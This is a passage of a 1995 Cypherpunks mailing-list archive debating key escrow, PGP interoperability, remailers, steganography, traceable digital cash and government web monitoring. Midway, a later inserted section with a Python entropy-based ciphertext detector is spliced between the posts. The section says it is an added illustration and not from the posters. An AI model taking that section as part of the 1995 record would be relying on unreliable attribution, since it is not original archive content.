He said his conclusion - that pornography accounted for about 50 per cent of the searches - tallied with recent US findings about the dominance of porn on the net. "There is no reliable way, technical or otherwise, to detect or intercept pornography," Prof Thimbleby said. Censorship of the Internet was impossible, because pornographers could easily disguise their material. And censoring programs such as SurfWatch and Internet Filter could not cope with all the fast-changing pornographic material. Because censorship was technically and politically impractical, Prof Thimbleby suggested that a better response was to dilute the pornography with other material. "The Internet has very little interesting material for the non-specialist user. It needs more," he said. "When it has more, it is just possible that pornography will slip into its statistically appropriate place, one aspect of humanity but not the most prominent on the Internet." ----- From pcassidy at world.std.com Wed Sep 13 09:15:56 1995 From: pcassidy at world.std.com (Peter F Cassidy) Date: Wed, 13 Sep 95 09:15:56 PDT Subject: Software vs Money Laundering In-Reply-To: <199509131549.LAA22502@panix.com> Message-ID: On Wed, 13 Sep 1995, Duncan Frissell wrote: > At 10:48 AM 9/13/95 -0400, John Young wrote: > > > Can artificial intelligence be used to combat crime by > > ferreting out money laundering? Officials at law > > enforcement, defense and intelligence agencies like to > > think so. They have suggested creating a sophisticated > > computer program to screen records of the more than > > 700,000 electronic money transfers involving U.S. > > institutions each day and to flag suspicious ones for > > further investigation. By using AI, they hope to stop > > some of the $300 billion in profits from drug deals and > > other illegal activities that they estimate is laundered > > world-wide each year. 
> > But in a report issued yesterday,
> > the congressional Office of Technology Assessment says
> > any such plan would face considerable obstacles.
> > [Cyberian Joel Reidenberg, an OTA advisor, is quoted.]
> >
>
> Not the least of which is that money launderers can use "AI Software" to
> generate a stream of real and dummy money transfers that emulates "normal"
> money transfers. Not to mention the fact that monopoly money transfer
> networks that can be surveilled by the Feds (FEDWIRE and SWIFT) are not long
> for this world. They will be replaced by encrypted, open, net-based systems.

The article fails to point out that this system - actually one much larger in scope - already exists as Treasury's FINCEN system, headed by a former Army AI expert. FINCEN sifts all the bank transfer manifests and, last I looked, had stuck tentacles into other agencies' databases to further collate and refine its focus - now toward locating potential targets. FINCEN was only supposed to be marshalled for Justice Department investigations of suspected money laundering. Next, it'll be used to auto-author warrants and indictments...

From andrew_loewenstern at il.us.swissbank.com Wed Sep 13 09:32:16 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Wed, 13 Sep 95 09:32:16 PDT Subject: GAK/weak crypto rationale? Message-ID: <9509131628.AA00879@ch1d157nwk>

Brian Davis writes: [...snip...]

> Particularly effective were the court-approved video and audio
> tapes of the Speaker taking a bribe in exchange for certain action
> on legislation [...snip...]
> Wiretaps, hidden microphones, and hidden cameras put corrupt
> politicians (I know - redundant) out of business.

Encryption does little to protect you from hidden cameras and microphones (or informants!). If you already know your target then you can probably get around encryption (sure it's not as simple as a wiretap, but hey, nobody said it had to be easy).
Encryption prevents 'fishing expeditions' and unauthorized monitoring; this is what the LEAs don't want to admit.

andrew

From tcmay at got.net Wed Sep 13 10:16:23 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 13 Sep 95 10:16:23 PDT
Subject: Can GAK be made "not interoperable" with PGP?
Message-ID:

At 2:34 PM 9/13/95, Hal wrote:
>I think this is setting up the rationale for software key escrow. One of
>the big loopholes in this idea has always been that it would be easy for
>bad guys to superencrypt or otherwise bypass the legal encryption. The
>response has been that the systems will be designed so that compliant
>systems will not interoperate with rogue systems. And the counter-response
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>to that was that criminals (and privacy advocates) would use software
>which would operate compliantly with conventional programs and maintain
>privacy when talking to other rogue programs.

But is this even possible, to make a GAK system "not interoperable" with, say, PGP?

Unless the GAK system has some sort of entropy analyzer, and can recognize high-entropy sources which it presumes to be encrypted data (*), one can of course PGP-encrypt a text file and then GAK the resulting file. Many of us are already using PGP mostly in this way, i.e., writing files in text editors, PGP-encrypting and getting an ASCII file back, and then sending. GAK will still have to deal with this mode.

(* On the idea of entropy analyzers. This is implausible, for many reasons. Any high-entropy file could have the entropy reduced by padding with low-entropy sources. And there would be "false positives." Some ostensibly plaintext posts are so incoherent (;-}) they might be "rejected" by such a GAKalyzer.)

So, is any conceivable GAK escrow system possible that cannot be used with other crypto programs? Text is text, unless the GAK program purports to accept or reject the text based on entropy considerations.
And I can't imagine that part of the GAK program would be robust against hacking.

>This new line will be used to respond to this argument, I think. Even if
>it is admitted that there is no way for the government to be able to tell
>what the criminals say amongst themselves, it will still be useful to be
>able to tell what they say to other people. Therefore software key
>escrow will be argued to still be useful even though it can be defeated.

But such traffic analysis is made moot by remailers, as we all know. What I think we may be facing, if the folks pushing GAK are really serious about all this, are restrictions on *who we may mail to*!!! For if Alice is "allowed" to send a message, GAKked or not, to a remailer.... (I can speculate about laws saying only "internationally registered" sites can use e-mail, but this seems impractical in the extreme...lots of issues.)

The GAK advocates need to realize that superencryption will be as easy as it is today to use PGP, and that even traffic analysis will be defeated if remailers are used.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From yihchun at u.washington.edu Wed Sep 13 10:21:27 1995
From: yihchun at u.washington.edu (Yih-Chun Hu)
Date: Wed, 13 Sep 95 10:21:27 PDT
Subject: Scientology tries to break PGP - and
In-Reply-To:
Message-ID:

On Wed, 13 Sep 1995, Andy Brown wrote:
> On Wed, 13 Sep 1995, Henry W. Farkas wrote:
>
> > If decrypted with the "alternate" or "fake" secret key, the encrypted file
> > is wiped until it reaches a marker; the remainder of the file is
> > displayed.
> > If you use your "primary" or "real key", the extraneous text
> > is simply stripped.
>
> Useless I'm afraid. They have the source code and have disabled your
> "feature" and attached loud alarm bells to it.
>

I don't see what's wrong with removing any checking done by PGP. (i.e. don't keep a checksum or whatever) After all, they can't prove that you didn't just encrypt a pgp +makerandom file. Obviously, I would not want to use this "feature" in some cases, so make adding a checksum be an extra command line option. The new feature would of course not be backwards compatible, but there is no way to disable the "feature" and no way to attach loud alarm bells. Of course, you are then faced with giving them a key which you know will decrypt the file to gibberish. Ideally, you would stego the encrypted file.

+---- Yih-Chun Hu (finger:yihchun at cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun yihchun at cs.washington.edu |
| http://weber.u.washington.edu/~yihchun yihchun at u.washington.edu |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641 B2 A0 DE 9E 36 C0 EB A6 F9 3E D2 DD 2F 27 74 79 |
| 2047/DF0403F9 18 EB 62 C8 7F 06 04 67 42 76 24 E2 99 D1 07 DC |
+---- Random Thought ------------------------------------------------------+
|I conducted an experiment to test Murphy's Law, but everything went wrong.|
+--------------------------------------------------------------------------+

From tcmay at got.net Wed Sep 13 10:48:20 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 13 Sep 95 10:48:20 PDT
Subject: CYPHERPUNK considered harmful.
Message-ID:

At 10:43 AM 9/13/95, Peter Trei wrote:
> "CYPHERPUNK" considered harmful
>
> I would like to propose that we, the 'cypherpunks', are making a
>strategic error, which will make it far more difficult to achieve the
>goal we share.

Discussing some goals we might share, or ought to share, is certainly not out-of-line.
Indeed, this discussion has come up many times on this list, though perhaps not much in the past year. (Those C coders do seem to be having their way...:-} ).

> Our error lies in our approach to encouraging the widespread use of
>crypto. It is an error of hubris - overweening pride.

I think many people here are doing a lot to encourage wide use of encryption, remailers, etc. They write hooks to popular mail programs, they give public talks, they fight against restrictions and regulations, and they deploy new systems. That some folks have very occasionally mentioned "Joe Sixpack" does not mean that much, in my opinion.

>
> We too often think of ourselves as an elite - smarter and better in
>various ways to our non-cpunk neighbours. We refer to these others as
>'Joe Sixpack" and other such derogatory terms.
>
> The problem is that in doing so we are marginalizing ourselves.
>
> We call ourselves 'cypherpunks'. While this is derived from the SF
>term 'cyberpunk', consider the image we are creating for ourselves:
>
> A 'punk' is a marginalized young adult, one who rejects the norms
>of his or her society, and takes delight in irking those around him with
>his or her rejection. The older of us will think of James Dean in 'Rebel
>Without a Cause', or Brando in 'The Wild One'. Later, you get images
>such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
>other icons of the 'punk rock' movement.

While I have had some qualms about the name, on balance I think it has been good for us. After all, it's not as if _other_ groups don't already exist! In particular, the British branch of Cypherpunks disliked the name "Cypherpunks" so much that they used a different name for themselves, the "U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for whatever reasons. But the name may have been a factor, at least.
Similarly, there's the Libertarian Party, with similar themes to our own, the International Association of Cryptographic Research (or somesuch), and even several nascent groups like "Terra Libre" and "DigitalLiberty" which purport to have a similar focus to what we have. And of course there are _several_ groups devoted specifically to lobbying for various sorts of cyberspatial rights, laws, etc.: EFF, EPIC, CPSR, VTW, and the ACLU.

All of these groups have a different focus than we have. If I were to pick one that matches Peter Trei's proposed organization, it would be the EFF. Thus, I suggest Peter and others of like mind look into helping out the EFF in its worthy causes. I mean no disrespect here to Peter's views, nor am I suggesting he leave this list. Plenty of room for support of the EFF and being on this list. I'm a member of the EFF, for example (though their computer has me as "Tim Mat" for some reason).

But for some reason--draw your own conclusions--the Cypherpunks list has a membership of something like 600-800 subscribers, more if you count folks who subscribed for a while, or who read it in other places. I don't think "Terra Libre" or "DigitalLiberty" are quite as successful and visible. We fill a certain niche which is useful to have filled, a more radical facet of things. If we didn't exist, or renamed ourselves "Concerned Citizens for Cryptographic Protection," CCCP, then somebody would have to _invent_ the Cypherpunks!

I addressed the issue of our name, pluses and minuses, in an early chapter of my Cyphernomicon (http://www.oberlin.edu/~brchkind/cyphernomicon/):

2.4.10. "Where did the name 'Cypherpunks' come from?"
+ Jude Milhon, aka St. Jude, then an editor at "Mondo 2000," was at the earliest meetings...she quipped "You guys are just a bunch of cypherpunks." The name was adopted immediately.
- The 'cyberpunk' genre of science fiction often deals with issues of cyberspace and computer security ("ice"), so the link is natural.
A point of confusion is that cyberpunks are popularly thought of as, well, as "punks," while many Cyberpunks are frequently libertarians and anarchists of various stripes. In my view, the two are not in conflict.
- Some, however, would prefer a more staid name. The U.K. branch calls itself the "U.K. Crypto Privacy Association." However, the advantages of the name are clear. For one thing, many people are bored by staid names. For another, it gets us noticed by journalists and others.
- - We are actually not very "punkish" at all. About as punkish as most of our cyberpunk cousins are, which is to say, not very.
+ the name
- Crypto Cabal (this before the sci.crypt FAQ folks appeared, I think), Crypto Liberation Front, other names
- not everybody likes the name...such is life

--------

Getting back to your suggestion that "we" change the name to something more respectable. How could "we" do this, given that "we" are an effective anarchy? I can't imagine a vote on this, and the endless debates on what "we" ought to call ourselves would be a waste of time.

Fortunately, there's an elegant solution: form your own group. Form your own group, your own mailing list, with a catchy name, something like "The Privacy Education Foundation," or "The American Civil Liberties Union" (whoops, taken), or "The Society for the Preservation of Cyberspatial Liberty." Then announce it on our list, and elsewhere. People will vote with their feet. If your "meme" is catching, your list will rapidly gain members. Maybe this Cypherpunks list will even atrophy away. Evolution in action. The market in action. A better approach than trying to get the name and the charter changed.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tedwards at Glue.umd.edu Wed Sep 13 10:52:48 1995
From: tedwards at Glue.umd.edu (Thomas Grant Edwards)
Date: Wed, 13 Sep 95 10:52:48 PDT
Subject: An opportunity not to be missed
In-Reply-To: <199509131610.MAA26686@panix.com>
Message-ID:

On Wed, 13 Sep 1995, David C. Lambert wrote:
> I propose that we get some likely candidate (actually, a similar candidate
> to the one above) to advocate the benefits of anonymity on the net.

Try Harry Browne (http://www.rahul.net/browne). I'm 100% certain that he would be willing to support cryptographic rights and freedom of internet speech.

> You may ask why these candidates would be interested in this type of thing,
> and my response is that they can be forced. The religious right has no
> problem bringing their agenda into the public spotlight and forcing their
> issues onto candidates because of their willingness to use hyperbole and
> fanaticism (not to mention pressure on advertisers and other sponsors).

The Religious Right brings their agenda to the public spotlight because they become incredibly involved in local politics on a nationwide basis and have the knowledge, means, and money to influence politics at this level. Very few people who are outside the political process realize the amount of organization, dedication, and dollars required to achieve political validity.

-Thomas Edwards

From bdavis at thepoint.net Wed Sep 13 11:33:00 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Wed, 13 Sep 95 11:33:00 PDT
Subject: Whitehouse "dissident" web site monitoring?
In-Reply-To: <199509131412.KAA26837@panix.com>
Message-ID:

On Wed, 13 Sep 1995, Duncan Frissell wrote:
> At 06:03 PM 9/12/95 -0400, Brian Davis wrote:
>
> >Unbelievable!!! To add to this distressing truth, I have learned that
> >the White House also subscribes to a number of newspapers and periodicals
> >which are reviewed for things of interest to the Administration and to
> >the President. I I I I I I ammmmmmmmmm shocked!
>
> The government, as you no doubt know, sometimes operates under different
> rules. Thus when the "Red Squad" (Intelligence Division) of the New York
> City Police (located in that big building on the North side of Vandam
> between Greenwich and Houston BTW) was sued for maintaining files on "lawful
> protest groups" they entered into a consent agreement to refrain from this
> sort of thing. Later, the courts said that this agreement meant that the
> cops couldn't even listen to WLIB radio (NYC's favorite radical
> African-American station) to find out in advance where rallies were going to be.
>

I am not familiar with this incident, but I note that state authorities, not federal, were involved according to your post. Was the consent decree also filed in state court? And even if it was in federal court, was the legal theory on which the plaintiffs proceeded based on NY state law or federal law??

> Since the White House is doing this reading of sites with public funds and
> since that institution is the most powerful in the world --- it can nuke its
> enemies, for example --- people are naturally interested to discover if they
> are the subject of an investigation.
>

The White House also reads publicly available newspapers and magazines (I assume). How is accessing a Web site different from that?

> This is a demonstration of the unintended effect of electronic surveillance
> technology. The fact is that it can do more harm to the authorities than to

Is the World Wide Web your idea of "electronic surveillance technology"??
I would agree that packet sniffing is a different problem, but accessing an open Web site seems reasonable to me. Would you prefer that the staffers use home computers to do this (in an attempt to hide their tracks)? As far as I know, this was all done openly and the Web site chose, right or wrong, to reveal the contents of their log files to someone. Again, what about the complaints heard in this forum recently about law enforcement's obtaining similar log files from the Web site set up regarding the child's kidnapping?

> the public. The Nixon Tapes/The Thompson Square Park Riot Video/The Rodney
> King Video. Since those in power are more interesting than ordinary people,
> they represent a more "target-rich environment." Information about their
> activities has greater commercial value and is thus more likely to see the
> light of day.

Not only "those in power" but those in the public eye/public figures. On that rationale, Phil Zimmermann is probably a public figure with respect to encryption ...

> DCF
>
> "There are more of us than there are of you."
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

That, of course, depends on what you mean by "us" and "you."

EBD
Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!

From loki at obscura.com Wed Sep 13 11:35:04 1995
From: loki at obscura.com (Lance Cottrell)
Date: Wed, 13 Sep 95 11:35:04 PDT
Subject: Mixmaster posting poll
Message-ID:

I think that I am not being clear enough about what I want to do. Back when I started running remailers, I was using a machine with no local news software at all. Rather than compile a bunch of software just to allow the "Anon-Post-To:" command to work, I hacked the scripts to automatically send those messages to a mail2news gateway. Mixmaster now has a similar built in anonymous posting ability.
If you have inews on your machine, then Mixmaster can build the "Newsgroups:" header and send the message to inews. But what if you are running Mixmaster and you don't have inews but you want to support posting? The answer is to have Mixmaster put together a message to send to a mail2news gateway for it to post.

When I look at the currently available public mail2news gateways, I see that two standards already exist. The first is the group.name at gateway. The other is mail2news at gateway with a "Newsgroups:" header. It is easy for me to have mixmaster take the request for anonymous posting, and build the appropriate message for whichever kind of gateway I want to use. I only want to support one of them. The question is, which one should I support? Which are there more of? Which are there likely to be more of in the future? I seem to recall that someone on this list wrote some mail2news software. Who was it and which standard did it follow (if either)? Has anyone installed it? Is anyone else planning to install it? I will install a gateway when I get my T1 (in a couple of months).

-Lance

At 8:35 AM 9/13/95, Rich Salz wrote:
>> If the form alt.usenet.group at remailer.com was used, wouldn't the
>> system running the remailer have to have an alias defined for each and
>> every newsgroup that it plans on handling?
>
>No. Sites running sendmail, for example, could set up rules that
>just knew the top-level hierarchies and fed those into a special
>"mailer" that gatewayed them.
>
>My opinion is that making any names well-known is a bad idea, and
>that attaching special semantics to "mail2news at xxx" is a real bad
>idea. Instead, just send the message to the specified recipient
>and let it do whatever magic needs to be done.
>
>If mixmaster wants to function as a mail/news gateway, it should
>do something special when it sees the Newsgroups header -- process
>the message and feed it into rnews, presumably.
>
>I guess, but not yet having read the code do not know, that this is
>cleaner and more easily extensible (or removable).
> /r$

----------------------------------------------------------
Lance Cottrell loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche
----------------------------------------------------------

From dcl at panix.com Wed Sep 13 11:57:21 1995
From: dcl at panix.com (David C. Lambert)
Date: Wed, 13 Sep 95 11:57:21 PDT
Subject: An opportunity not to be missed
Message-ID: <199509131857.OAA08914@panix.com>

-----BEGIN PGP SIGNED MESSAGE-----

Thomas Grant Edwards wrote:
> The Religious Right brings their agenda to the public spotlight
> because they become incredibly involved in local politics on a
> nationwide basis and have the knowledge, means, and money to
> influence politics at this level. Very few people who are outside
> the political process realize the amount of organization, dedication,
> and dollars required to achieve political validity.

This is a well made point, and I certainly do not claim to be one of those who has an internal understanding of the political process. I submit that the frenzied coverage of the presidential campaign *severely reduces* the required knowledge, means and money, needed to raise issues to the fore, and that furthermore, a lot of the "means and money" that you mention are used for communication and organization. Of course, an organized campaign on the Net is essentially free, but for the cost in time. It is my opinion that the political power of the Net is just starting to awaken, and that a perception of impotence in the political process, is just that - a perception.

David C.
Lambert dcl at panix.com (finger for PGP public key)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFcpYKpplsfgM88VAQF8lgP8CViP3ggK68e5l6KGTqcI/2uHp0cP6z9t
a2etUdxH0QBuyWu3MVVsWuB+6n6QcRSO69rh0E/U5apzqJoPMdirbLt8B/cMdsAg
yY4vfEhGLZkuG5470uP9GKR6TF00YiZmfIoXtfDJPmbfcRwj018S1xe7myeGyLJm
ARpzGgrYR30=
=r3ff
-----END PGP SIGNATURE-----

From frissell at panix.com Wed Sep 13 12:26:55 1995
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 13 Sep 95 12:26:55 PDT
Subject: Can GAK be made "not interoperable" with PGP?
Message-ID: <199509131926.PAA14444@panix.com>

At 10:26 AM 9/13/95 -0700, Timothy C. May wrote:
>But is this even possible, to make a GAK system "not interoperable" with,
>say, PGP?
>
>Unless the GAK system has some sort of entropy analyzer, and can recognize
>high-entropy sources which it presumes to be encrypted data (*), one can of
>course PGP-encrypt a text file and then GAK the resulting file.

I took it to mean that they were saying that an approved program on one end of a communication exchange could not exchange encrypted messages or establish an encrypted session of some kind with an unapproved program on the other end. Not trying to outlaw superencryption (PGP on both ends using a GAKed channel) but GAK on one end working with an unapproved system on the other end. A ringer GAK-work-alike that would defeat the intent of GAK. I don't know if the government can prevent that with a software-only system or indeed if half a secure system can be made completely secure.

DCF

"Markets and open systems beat governments and closed systems."

From frissell at panix.com Wed Sep 13 12:27:18 1995
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 13 Sep 95 12:27:18 PDT
Subject: CYPHERPUNK considered harmful.
Message-ID: <199509131926.PAA14458@panix.com>

At 10:57 AM 9/13/95 -0700, Timothy C. May wrote:
>While I have had some qualms about the name, on balance I think it has been
>good for us.
>After all, it's not as if _other_ groups don't already exist!
>In particular, the British branch of Cypherpunks disliked the name
>"Cypherpunks" so much that they used a different name for themselves, the
>"U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for
>whatever reasons. But the name may have been a factor, at least.

Note too that Brits differ from Americans. "Wired" worked well here from the beginning but has had problems there. Differing national characteristics.

DCF

"Let's all just agree to disagree. My system can thrive with widespread disagreement among rabid individualists --- can yours?"

From futplex at pseudonym.com Wed Sep 13 12:53:13 1995
From: futplex at pseudonym.com (Futplex)
Date: Wed, 13 Sep 95 12:53:13 PDT
Subject: Corporate Use of Anon WWW Proxies
Message-ID: <9509131953.AA19241@cs.umass.edu>

[I pulled this from the firewalls list (use majordomo at greatcircle.com to join)]

Alex Eveleigh writes:
> Subject: Monitoring Activity on the Internet
[...]
> I would like to get some opinions on how easy it would be for someone
> to monitor what information is being accessed on the Internet by our
> company. For example how easy would it be for our competition to monitor
> all sites that people in our company are accessing and what
> information we are pulling off the Internet.

This struck me as rather ironic in the wake of The Govt. Could Be Reading _Your_ Home Page. It also sparked me to draw the short connection between industrial espionage (and simple industrial nosiness), and anonymous Web proxies. An obvious point, really, but companies often have an interest in concealing the nature/extent of their Web crawlings, too. Perhaps there's a market niche, or a few pro-anonymity publicity points, here for someone.

-Futplex

"Everybody's got something to hide except for me and my monkey" -J.L. & P.McC.
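Tim May's "Can GAK be made 'not interoperable' with PGP?" post above, and Duncan Frissell's reply to it, turn on whether a compliant program could reject already-encrypted input with an "entropy analyzer". What follows is an added illustration and is not code from either poster or from any escrow proposal: a byte-entropy detector of the kind such an analyzer would have to be, run over constructed samples. The "ciphertext" is seeded random bytes standing in for PGP's binary output, the "armor" is base64 in 64-column lines standing in for a PGP ASCII-armored file, the sample text and the 7.0 bits/byte threshold are my choices, and none of it is real PGP data. It shows the two failure modes Tim names: armored ciphertext cannot exceed about 6 bits per byte, so a threshold that catches raw ciphertext passes it, and ciphertext diluted with ordinary text drops below the threshold as well.

```python
"""Byte-entropy 'ciphertext detector' and the cases that defeat it.

Added example, not code from the original posts.  Every sample below is
constructed here: seeded random bytes stand in for PGP's binary output and
base64 in 64-column lines stands in for ASCII armor.
"""
import base64
import math
import random
from collections import Counter

# --- constructed samples -------------------------------------------------
PLAINTEXT = (
    b"The GAK advocates need to realize that superencryption will be as easy "
    b"as it is today to use PGP, and that even traffic analysis will be "
    b"defeated if remailers are used. "
) * 40

_rng = random.Random(1995)  # fixed seed so the figures are reproducible
CIPHERTEXT = bytes(_rng.randrange(256) for _ in range(4096))  # stand-in for binary PGP output


def ascii_armor(raw: bytes) -> bytes:
    """Base64 in 64-column lines, i.e. the shape of an ASCII-armored file."""
    b64 = base64.b64encode(raw)
    return b"\n".join(b64[i:i + 64] for i in range(0, len(b64), 64)) + b"\n"


SAMPLES = {
    "plaintext": PLAINTEXT,
    "binary ciphertext": CIPHERTEXT,
    "ascii-armored ciphertext": ascii_armor(CIPHERTEXT),   # what "PGP then GAK" sends
    "ascii-armored plaintext": ascii_armor(PLAINTEXT),     # innocent content, same encoding
    "ciphertext padded with text": CIPHERTEXT + PLAINTEXT * 2,  # Tim's low-entropy padding
}


# --- the detector --------------------------------------------------------
def shannon_entropy(data: bytes) -> float:
    """Zeroth-order Shannon entropy in bits per byte, from 0.0 to 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes, threshold: float = 7.0) -> bool:
    """The rule a naive 'GAKalyzer' would apply: high entropy means ciphertext.
    7.0 bits/byte sits between raw ciphertext (about 7.95) and English text
    (about 4 to 5); base64 output can never reach it (64 symbols = 6 bits)."""
    return shannon_entropy(data) >= threshold


def analyze(threshold: float = 7.0) -> dict:
    """Run the detector over every sample; returns name -> {entropy, flagged}."""
    return {
        name: {"entropy": round(shannon_entropy(data), 2),
               "flagged": looks_encrypted(data, threshold)}
        for name, data in SAMPLES.items()
    }


if __name__ == "__main__":
    for name, result in analyze().items():
        verdict = "FLAGGED" if result["flagged"] else "passes "
        print(f"{verdict}  {result['entropy']:.2f} bits/byte  {name}")
```

Only the raw binary sample trips the detector. Lowering the threshold to the roughly 6 bits/byte of the armored sample does not repair it: any base64-encoded binary attachment (an image, a compressed file) encodes to the same near-6.0 figure, so the analyzer only trades misses for false positives, which is the "text is text" point of the original post.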
From futplex at pseudonym.com Wed Sep 13 13:08:02 1995
From: futplex at pseudonym.com (Futplex)
Date: Wed, 13 Sep 95 13:08:02 PDT
Subject: Minor Risk to LSB Steganography
Message-ID: <9509132007.AA19945@cs.umass.edu>

Last week I attended a lecture given by Dexter Kozen at Cornell, on "Efficient Algorithms for Optimal Transmission of Video Data". He mentioned in passing a couple of approaches to choosing data that may acceptably be lost in the process (i.e. without excessive picture quality degradation). One scheme (which I believe counts as a "corona method") involves simply discarding the LSBs of all the encoded pixels or whatnot. This method was not at all a focus of the talk. Anyway, I thought I'd mention it as another minor potential threat to the use of LSB steganography in video transmission, e.g. MPEG streams.

-Futplex

From m1smf99 at FRB.GOV Wed Sep 13 13:48:22 1995
From: m1smf99 at FRB.GOV (Scott M Fabbri)
Date: Wed, 13 Sep 95 13:48:22 PDT
Subject: An opportunity not to be missed
In-Reply-To: <199509131857.OAA08914@panix.com>
Message-ID: <9509132022.AA27925@arcss5.FRB.GOV>

A non-text attachment was scrubbed...
Name: not available
Type: application/pgp
Size: 14 bytes
Desc: not available
URL:

From adam at bwh.harvard.edu Wed Sep 13 14:21:23 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Wed, 13 Sep 95 14:21:23 PDT
Subject: An opportunity not to be missed
In-Reply-To: <199509131857.OAA08914@panix.com>
Message-ID: <9509132119.AA03389@waller.harvard.edu>

| Of course, an organized campaign on the Net is essentially free,
| but for the cost in time. It is my opinion that the political power
| of the Net is just starting to awaken, and that a perception of
| impotence in the political process, is just that - a perception.

An organized campaign anywhere, for any purpose, is not free, since it will require good people to run and organize it.
The Key cracking ring only did what we all knew it could do because Hal, Adam and several other good folks took the time to do it.

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From hfinney at shell.portal.com Wed Sep 13 14:22:36 1995
From: hfinney at shell.portal.com (Hal)
Date: Wed, 13 Sep 95 14:22:36 PDT
Subject: Digital Cash on sci.crypt
Message-ID: <199509132121.OAA25994@jobe.shell.portal.com>

There has been some discussion on sci.crypt of digital cash and its facilitation of kidnapping, extortion, etc. Here is a posting I made which mentions an on-line paper on the topic. I had met the author, Markus Jakobsson, at Crypto 95, but I only had a chance to check out his web site yesterday.

awc at slcawc.aug.ipp-garching.mpg.de (Arthur Carlson TOK ) writes:
>[In response to a discussion of whether digital cash could be used to
>provide anonymous collection of ransom money]
>Is there really no technical fix for this? To enable the prevention of
>double spending in off-line systems, the ID of the withdrawer is coded
>into the coins in a way that is verified by the bank. If the victim's
>relatives can undo enough of the code to satisfy the bank, why can't
>they undo the rest to detect when the coins are spent? Alternatively,
>why can't the bank put an identifier on the coins (in a way that isn't
>destroyed by the unblinding) that amounts to a message encoded in the
>public key of the withdrawer? Then the withdrawer can make the
>destination of the ransom money visible by revealing his private key
>(after the victim has been released, of course). (He also reveals
>every dime he spent in the last year and all his kinky love letters,
>but, hey, we're trying to catch a kidnapper here.)

There has been considerable discussion of this problem in the literature recently. A paper I found yesterday on the net is by Markus Jakobsson and Moti Yung: Revokable and Versatile Electronic Money, at (postscript format).
It has references to other work as well.

The specific attack I discussed earlier applies to the current DigiCash scheme (or at least how it is assumed to work). Offline cash systems would be more complicated. The references in the paper mentioned above describe how these attacks would work on such systems and some ways of avoiding them.

However there is a more powerful attack, which the Jakobsson paper addresses, in which the bank as a whole is coerced. Maybe terrorists threaten to blow up the World Trade Center unless Citibank engages in a specific protocol which will leave the terrorists with millions of dollars in fully blinded electronic cash. Even if the normal withdrawal protocol has signatures, etc. which would prevent this, Jakobsson shows that there is a corrupted protocol which if the bank is forced to follow it will leave the criminals with valid but untraceable electronic cash.

The solution in the paper is to make it so that none of the ecash issued by the bank is untraceable. Under normal use it is anonymous, but if necessary the authorities can break the anonymity. This is sometimes called "Clipper cash" after the U.S. Clipper chip proposal which had similar privacy properties. With Jakobsson/Yung's approach even the more powerful attack can be defeated because the cash is traceable, and no amount of coercion will allow the attacker to create valid but untraceable cash.

While these approaches are technically interesting, the political implications are more ominous. While Jakobsson labels the entity who has the power to break the anonymity an "ombudsman", implying that he defends the interests of the cash holder, he could equally well be called a "policeman" because he is the one who catches the criminals. It is all a matter of how you look at it. The question is whether these various threats of kidnapping, blackmail, extortion, etc. are good enough reasons to go to a cash system where privacy is protected only at the sufferance of government agencies.
There are plenty of precedents for governments misusing supposedly-private information, such as the use of phone records to track down those who resisted the German regime during World War II. One of the attractive aspects of electronic cash has been its immunity to this form of governmental coercion. The overwhelmingly negative response to the Clipper chip proposal (other than in the cryptographic and law enforcement communities) may apply to Clipper cash as well.

A related issue is the possible competition of rival cash systems. As with Clipper, where it would apparently be necessary to forbid the use of alternatives, so with Clipper cash it would seem that people would prefer true anonymity over conditional protection, even if you call the cash tracer an "ombudsman". So there would seem to be a need for governments to criminalize the use of fully anonymous electronic cash in order to force people to use the ones which the government could track. Whether this will even be possible in an increasingly global financial system remains to be seen.

Hal Finney
hfinney at shell.portal.com

From vznuri at netcom.com Wed Sep 13 14:24:10 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Wed, 13 Sep 95 14:24:10 PDT
Subject: Whitehouse "dissident" web site monitoring?
In-Reply-To:
Message-ID: <199509132121.OAA05728@netcom23.netcom.com>

TCM:
> Although I am
>thought of as a "crypto anarchist," and basically am such a thing, the fact
>is that there aren't a lot of trials for thoughtcrime in this country. I
>have some doubts about the circumstances surrounding Danny Casolaro's
>death, though, so I don't say all is rosy and perfect.

amusingly, on one of those web sites, the death of Casolaro is indeed tied in with the conspiracy that "touched" (to say the least ) Vince Foster.

the Whitehouse web hits are potentially interesting. I agree they don't imply any "dissident web monitoring program".
